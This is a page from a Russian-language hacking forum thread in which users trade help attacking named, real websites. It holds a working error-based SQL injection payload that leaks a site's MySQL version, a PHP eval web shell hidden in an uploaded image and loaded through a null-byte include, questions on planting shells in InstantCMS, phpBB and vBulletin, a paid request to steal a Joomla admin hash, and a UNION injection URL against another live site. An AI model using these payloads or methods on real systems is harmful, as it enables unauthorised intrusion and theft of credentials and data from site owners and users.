Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. LelouchMe

    LelouchMe New Member

    Joined:
    31 May 2012
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Ребят, не знаю за что удалили мой пост, ведь я не просил никого ничего ломать - я попросил помочь мне, обьяснить почему не работают мои запросы, ведь я просто хочу разобраться. Впредь если мой пост удалят по несоответствию с правилами - напишите мне хотя бы в личку ответ. Спасибо заранее. На страничке http://footquest.poltava.ua/players в строке поиска скуль иньекция. Я пытался делать различные запросы но скорее всего передающиеся данные в запросе в скобочках. Как это обойти подскажите плс.
     
  2. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    507
    Likes Received:
    105
    Reputations:
    53
    постом отправляй
    s_user_nick='and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--
    Как и что тут менять - кури маны.
     
  3. LelouchMe

    LelouchMe New Member

    Joined:
    31 May 2012
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Duplicate entry '5.0.91-community1' for key 1
    бегаю по гуглу...
     
    #20523 LelouchMe, 2 Jun 2012
    Last edited: 2 Jun 2012
  4. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    162
    Likes Received:
    1
    Reputations:
    -10
    вы оказались правы. Код не сохранился, но потом перезалил картинку в другое место на форуме(проверил-код сохранился, все хорошо), но теперь пишу точно так же
    Code:
    vbseourl=users/38290-albums1533-1313.png
    
    и с нулл байтом пробывал
    Code:
    vbseourl=users/38290-albums1533-1313.png%00.php
    
    в итоге отображается пустая страничка. Что делать?
     
  5. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Как образом проверили?
    Может все таки не сохранился? И если там мини шелл вида
    Code:
    <? eval($_REQUEST['e']);?>
    , то может стоит все таки передавать еще доп. параметры в инклуд?
     
  6. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    162
    Likes Received:
    1
    Reputations:
    -10
    там полноценный шелл. Проверил так: залил картинку, сохранил у себя, открыл блокнотом(код был полностью целым)
     
  7. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108

    Начнем с того, что частенько такие функции как eval, system etc отключаются в PHP. Ищем phpinfo() - выясняем. Или еще проще - вместо eval в картинке заливаем сам phpinfo() и смотрим
     
    1 person likes this.
  8. LelouchMe

    LelouchMe New Member

    Joined:
    31 May 2012
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    я обещаю что буду искать, прежде чем задавать вопросы


    Самое интересное что эту статью читал!!! К моему примеру я ответа не нашел, так как запросы выполняются через information_schema а там разрешается ТОЛЬКО чтение. Мне же интересно можно ли как-то провести запрос на изменение данных...

    Konqi: тогда читайте учебник по php+mysql, все станет ясно, данный вопрос задавали многократно
     
    #20528 LelouchMe, 3 Jun 2012
    Last edited by a moderator: 3 Jun 2012
  9. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    народ, как можно вывести даннные если фильтруется limit
     
  10. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    507
    Likes Received:
    105
    Reputations:
    53
    where id=
    А вообще как-то странно фильтруется, хотя чёрт его знает что там за задумка была...
     
  11. LelouchMe

    LelouchMe New Member

    Joined:
    31 May 2012
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Вопрос: если в GET запросе в поле login=user ввести ' то фильтрация меняет кавычку на \' то есть на странице идёт вывод Логин: user\' это как-то можно обойти...? Заранее спс...
     
  12. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Нет.
     
  13. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    261
    Likes Received:
    65
    Reputations:
    4
    Существует ли способ залить шелл через InstantCMS v1.9.1 ?

    и какие есть еще способы залить шелл через phpbb 3.0.10.
    редактировать стили не получается
    Code:
    Incorrect string value: '\xC1\xF0\xFF\xED\xF1\xEA...' for column 'template_data' at row 1 [1366]...
    через восстановление бд тоже не катит (((
     
    #20533 Sleep, 5 Jun 2012
    Last edited: 5 Jun 2012
  14. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    А через "Баннеры" пробовали? Это вроде единственный способ в ней, вроде! ;)
     
  15. promarketing

    promarketing New Member

    Joined:
    5 Aug 2011
    Messages:
    14
    Likes Received:
    3
    Reputations:
    0
    Joomla 1.5

    index.php?option=com_weblinks&view=category&id=29&filter_order=%00'

    Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/site/www.site.com/libraries/joomla/database/database/mysql.php on line 344

    Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/site/www.site.com/libraries/joomla/database/database/mysql.php on line 344 Community Links

    Warning: Invalid argument supplied for foreach() in /home/site_webmaster/www.site.com/components/com_weblinks/views/category/tmpl/default_items.php on line 38

    $20 za pomosh v polycheniyy hasha admina esli vozmojno
     
    #20535 promarketing, 6 Jun 2012
    Last edited: 6 Jun 2012
  16. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,781
    Likes Received:
    854
    Reputations:
    857
    Ну поиск то для кого ?

    Взято отсюда

    Exploit #1

    Exploit #2
     
    _________________________
    #20536 BigBear, 6 Jun 2012
    Last edited: 6 Jun 2012
    1 person likes this.
  17. promarketing

    promarketing New Member

    Joined:
    5 Aug 2011
    Messages:
    14
    Likes Received:
    3
    Reputations:
    0
    tam sql inj ne v "id" a v "filter_order="

    http://yehg.net/lab/pr0js/advisories/joomla/core/%5Bjoomla_1.5_21%5D_sql_injection
     
  18. mr_zedox

    mr_zedox New Member

    Joined:
    30 Apr 2012
    Messages:
    25
    Likes Received:
    0
    Reputations:
    0
    Есть форум на vbulletin 3.8.4, есть эксплоит:
    Шо за "path" и как здесь залить шел? ПРописать полный путь до шела на моем хосте? Вот так:
    А дальше, как в php его запустить?
     
  19. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    http://www.mindsoul.ru/index.php?id=628
    хелп, чёт ничего не выводит
     
  20. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    135
    Likes Received:
    41
    Reputations:
    26
    http://www.mindsoul.ru/index.php?id=-628)+union+select+version()+--+
    ток обрезает, надо через базед крутить..
     
    3 people like this.
Loading...
Thread Status:
Not open for further replies.